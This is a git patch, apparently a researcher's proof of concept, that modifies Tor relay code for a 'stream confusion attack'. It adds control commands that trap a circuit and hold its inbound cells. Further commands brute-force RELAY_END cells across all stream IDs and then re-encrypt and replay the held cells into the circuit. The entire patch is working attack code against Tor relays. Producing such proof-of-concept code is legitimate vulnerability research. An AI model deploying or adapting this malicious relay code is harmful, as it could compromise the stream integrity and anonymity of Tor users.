From 52f1f8b19a8403b374f5515e291d133057b83db7 Mon Sep 17 00:00:00 2001
From: Jann Horn <jannh@google.com>
Date: Thu, 13 May 2021 01:32:31 +0200
Subject: [PATCH] relay code for stream confusion attack

---
 src/core/or/circuitlist.c         |   6 ++
 src/core/or/command.c             |   7 +-
 src/core/or/connection_edge.c     |   2 +
 src/core/or/relay.c               |  32 +++++++++
 src/feature/control/control_cmd.c | 106 ++++++++++++++++++++++++++++++
 5 files changed, 150 insertions(+), 3 deletions(-)

diff --git a/src/core/or/circuitlist.c b/src/core/or/circuitlist.c
index bd3668388068..cc64ece086cd 100644
--- a/src/core/or/circuitlist.c
+++ b/src/core/or/circuitlist.c
@@ -1263,6 +1263,12 @@ circuit_free_(circuit_t *circ)
    * the actual memory free. */
   tor_trace(TR_SUBSYS(circuit), TR_EV(free), circ);
 
+  extern circuit_t *trapped_circ;
+  if (circ == trapped_circ) {
+    log_warn(LD_CIRC, "TRAPPED circuit %p freed", circ);
+    trapped_circ = NULL;
+  }
+
   if (should_free) {
     memwipe(mem, 0xAA, memlen); /* poison memory */
     tor_free(mem);
diff --git a/src/core/or/command.c b/src/core/or/command.c
index 9226309ff7c8..41fa75de5cf5 100644
--- a/src/core/or/command.c
+++ b/src/core/or/command.c
@@ -473,9 +473,10 @@ command_process_relay_cell(cell_t *cell, channel_t *chan)
 
   if (!circ) {
     log_debug(LD_OR,
-              "unknown circuit %u on connection from %s. Dropping.",
+              "unknown circuit %u on connection from %s. Dropping. [A] [chan=%p]",
               (unsigned)cell->circ_id,
-              channel_describe_peer(chan));
+              channel_describe_peer(chan),
+              chan);
     return;
   }
 
@@ -616,7 +617,7 @@ command_process_destroy_cell(cell_t *cell, channel_t *chan)
 
   circ = circuit_get_by_circid_channel(cell->circ_id, chan);
   if (!circ) {
-    log_info(LD_OR,"unknown circuit %u on connection from %s. Dropping.",
+    log_info(LD_OR,"unknown circuit %u on connection from %s. Dropping. [B]",
              (unsigned)cell->circ_id,
              channel_describe_peer(chan));
     return;
diff --git a/src/core/or/connection_edge.c b/src/core/or/connection_edge.c
index a33c64fe19af..c4dbc6936ad9 100644
--- a/src/core/or/connection_edge.c
+++ b/src/core/or/connection_edge.c
@@ -650,6 +650,8 @@ connection_half_edge_add(const edge_connection_t *conn,
                                     connection_half_edge_compare_bsearch,
                                     &ignored);
   smartlist_insert(circ->half_streams, insert_at, half_conn);
+
+  log_warn(LD_OR, "Now half conns on circuit %p: %d\n", circ, smartlist_len(circ->half_streams));
 }
 
 /** Release space held by <b>he</b> */
diff --git a/src/core/or/relay.c b/src/core/or/relay.c
index f98688337020..f782e928c190 100644
--- a/src/core/or/relay.c
+++ b/src/core/or/relay.c
@@ -210,6 +210,12 @@ circuit_update_channel_usage(circuit_t *circ, cell_t *cell)
   }
 }
 
+extern int trap_next_cell;
+extern int trap_collect_cells;
+extern circuit_t *trapped_circ;
+unsigned long trapped_in_cells_count;
+cell_t trapped_in_cells[100];
+
 /** Receive a relay cell:
  *  - Crypt it (encrypt if headed toward the origin or if we <b>are</b> the
  *    origin; decrypt if we're headed toward the exit).
@@ -238,6 +244,32 @@ circuit_receive_relay_cell(cell_t *cell, circuit_t *circ,
   if (circ->marked_for_close)
     return 0;
 
+  // this MUST be before the relay_decrypt_cell(), otherwise that thing will
+  // encrypt the cell to the next hop, which modifies the state of the cipher.
+  // we'll have to encrypt the payload when reinjecting the cell later.
+  if (circ == trapped_circ) {
+    if (cell_direction == CELL_DIRECTION_OUT) {
+      log_warn(LD_OR, "TRAPPED circuit %p: passing through OUT cell", circ);
+    } else {
+      if (trapped_in_cells_count < sizeof(trapped_in_cells)/sizeof(trapped_in_cells[0]) && trap_collect_cells) {
+        log_warn(LD_OR, "TRAPPED circuit %p: holding IN cell %lu", circ, trapped_in_cells_count);
+        trapped_in_cells[trapped_in_cells_count] = *cell;
+      } else {
+        log_warn(LD_OR, "TRAPPED circuit %p: discarding IN cell %lu", circ, trapped_in_cells_count);
+      }
+      trapped_in_cells_count++;
+      return 0;
+    }
+  }
+
+  if (trap_next_cell && cell_direction == CELL_DIRECTION_OUT && !CIRCUIT_IS_ORIGIN(circ)) {
+    trap_next_cell = 0;
+    log_warn(LD_OR, "TRAPPED circuit %p: new - inbound cells on this circuit will be discarded", circ);
+    trapped_circ = circ;
+    trapped_in_cells_count = 0;
+    trap_collect_cells = 1;
+  }
+
   if (relay_decrypt_cell(circ, cell, cell_direction, &layer_hint, &recognized)
       < 0) {
     log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL,
diff --git a/src/feature/control/control_cmd.c b/src/feature/control/control_cmd.c
index 5b75c24692e5..394a1b3c29d5 100644
--- a/src/feature/control/control_cmd.c
+++ b/src/feature/control/control_cmd.c
@@ -15,13 +15,18 @@
 #include "app/config/config.h"
 #include "lib/confmgt/confmgt.h"
 #include "app/main/main.h"
+#include "core/crypto/relay_crypto.h"
 #include "core/mainloop/connection.h"
+#include "core/or/cell_st.h"
+#include "core/or/or_circuit_st.h"
+#include "core/or/channel.h"
 #include "core/or/circuitbuild.h"
 #include "core/or/circuitlist.h"
 #include "core/or/circuituse.h"
 #include "core/or/connection_edge.h"
 #include "core/or/circuitstats.h"
 #include "core/or/extendinfo.h"
+#include "core/or/relay.h"
 #include "feature/client/addressmap.h"
 #include "feature/client/dnsserv.h"
 #include "feature/client/entrynodes.h"
@@ -880,6 +885,102 @@ handle_control_extendcircuit(control_connection_t *conn,
   return 0;
 }
 
+int trap_next_cell = 0;
+int trap_collect_cells = 0;
+circuit_t *trapped_circ = NULL;
+extern unsigned long trapped_in_cells_count;
+extern cell_t trapped_in_cells[100];
+
+static const control_cmd_syntax_t trap_next_cell_syntax = {
+  .min_args=0,
+  .max_args=0,
+};
+
+/** Called when we get a TRAP_NEXT_CELL message. */
+static int
+handle_control_trap_next_cell(control_connection_t *conn,
+                             const control_cmd_args_t *args)
+{
+  (void)args;
+  trap_next_cell = 1;
+  control_printf_endreply(conn, 200, "targeting circuit with next relay cell");
+  return 0;
+}
+
+static const control_cmd_syntax_t brute_drop_streams_syntax = {
+  .min_args=0,
+  .max_args=0,
+};
+
+/** Called when we get a BRUTE_DROP_STREAMS message. */
+static int
+handle_control_brute_drop_streams(control_connection_t *conn,
+                             const control_cmd_args_t *args)
+{
+  static unsigned int streams_dropped_progress = 0;
+
+  (void)args;
+  if (!trapped_circ) {
+    control_printf_endreply(conn, 500, "no trapped circuit?");
+    return 0;
+  }
+  if (trap_collect_cells) {
+    trap_collect_cells = 0;
+    streams_dropped_progress = 1;
+  } else if (streams_dropped_progress == 0x10000) {
+    control_printf_endreply(conn, 500, "already done");
+    return 0;
+  }
+
+  // closing all at once would exhaust the maximum circuit queue size;
+  // so let the user manually trigger this in increments
+  unsigned int streamid;
+  for (streamid=streams_dropped_progress; streamid < 0x10000 && streamid < streams_dropped_progress + 0x6000; streamid++) {
+    char payload[1] = { END_STREAM_REASON_MISC };
+    relay_send_command_from_edge(streamid, trapped_circ, RELAY_COMMAND_END, payload, sizeof(payload), NULL);
+  }
+  streams_dropped_progress = streamid;
+  if (streams_dropped_progress == 0x10000) {
+    control_printf_endreply(conn, 200, "done, dropped all half-open streams");
+  } else {
+    control_printf_endreply(conn, 200, "done, dropped half-open streams up to %u, call me again", streams_dropped_progress);
+  }
+  return 0;
+}
+
+static const control_cmd_syntax_t replay_cells_syntax = {
+  .min_args=0,
+  .max_args=0,
+};
+
+/** Called when we get a REPLAY_CELLS message. */
+static int
+handle_control_replay_cells(control_connection_t *conn,
+                             const control_cmd_args_t *args)
+{
+  (void)args;
+  if (!trapped_circ || trap_collect_cells) {
+    control_printf_endreply(conn, 500, "no trapped circuit?");
+    return 0;
+  }
+  if (trapped_in_cells_count == 0) {
+    control_printf_endreply(conn, 500, "no cells trapped");
+    return 0;
+  }
+
+  or_circuit_t *orcirc = TO_OR_CIRCUIT(trapped_circ);
+  channel_t *chan = orcirc->p_chan;
+  for (unsigned long i=0; i<trapped_in_cells_count; i++) {
+    cell_t *cell = &trapped_in_cells[i];
+    cell->circ_id = orcirc->p_circ_id;
+    relay_crypt_one_payload(orcirc->crypto.b_crypto, cell->payload);
+    append_cell_to_circuit_queue(trapped_circ, chan, cell, CELL_DIRECTION_IN, 0);
+  }
+  control_printf_endreply(conn, 200, "done, replayed %lu", trapped_in_cells_count);
+  trapped_in_cells_count = 0;
+  return 0;
+}
+
 static const control_cmd_syntax_t setcircuitpurpose_syntax = {
   .max_args=1,
   .accept_keywords=true,
@@ -2350,6 +2451,11 @@ static const control_cmd_def_t CONTROL_COMMANDS[] =
   ONE_LINE(mapaddress, 0),
   ONE_LINE(getinfo, 0),
   ONE_LINE(extendcircuit, 0),
+
+  ONE_LINE(brute_drop_streams, 0),
+  ONE_LINE(trap_next_cell, 0),
+  ONE_LINE(replay_cells, 0),
+
   ONE_LINE(setcircuitpurpose, 0),
   OBSOLETE(setrouterpurpose),
   ONE_LINE(attachstream, 0),

base-commit: 83f895c015de55201e5f226f84a866f30f5ee14b
-- 
2.31.1.607.g51e8a6a459-goog

